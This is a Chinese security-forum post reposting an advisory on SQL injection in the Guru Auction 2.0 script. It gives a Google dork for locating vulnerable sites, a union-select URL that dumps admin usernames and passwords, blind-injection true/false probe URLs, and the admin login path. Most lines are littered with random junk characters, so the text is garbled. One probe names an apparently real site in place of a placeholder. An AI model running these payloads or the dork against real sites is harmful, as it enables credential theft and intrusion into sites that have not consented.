找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2148|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
5 ^8 I1 z! p1 K) ~6 r9 j/ n) B# v3 h7 [6 z  Q3 i( M
作者     : v3n0m7 `6 b1 f2 G/ K8 {6 U4 {
应用 : Guru Auction 2.0
: ~& \. C! V9 P" b$ RPrice       : $49: u, z, l, A4 C' `: o
Vendor      : http://www.guruscript.com/
# E) Y5 Z" l- I) j+ ~Google Dork : inurl:subcat.php?cate_id=
( u; r1 D" ^* C ) f" N, @$ |- T3 h
SQLi p0c:
8 J6 R/ O3 U3 P6 o& H7 `  O~~~~~~~~~~
* t$ `4 V/ N$ d# T& lhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--1 K1 Z& E9 l% C: Y# H
9 z) V8 E& @# h8 R7 n+ v
) ]! N3 r$ M5 U7 T; V# D
盲注 p0c:
: a$ g8 q) i8 J3 l: m4 I~~~~~~~~~~
9 I2 J. E% J) w) H/ Rhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
% I9 A0 `* G& R4 y# V, T+ S$ nhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false6 p+ d& I' V( O" h$ u

: _. k) a" H0 B# B管理登录入口:& f  P$ Y3 B3 M$ t0 o$ b  L
~~~~~~~~~~. s+ _7 J2 E! }$ |7 m1 b6 B
http://domain.tld/[path]/admin/
4 q& B; [, I2 o6 W$ p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表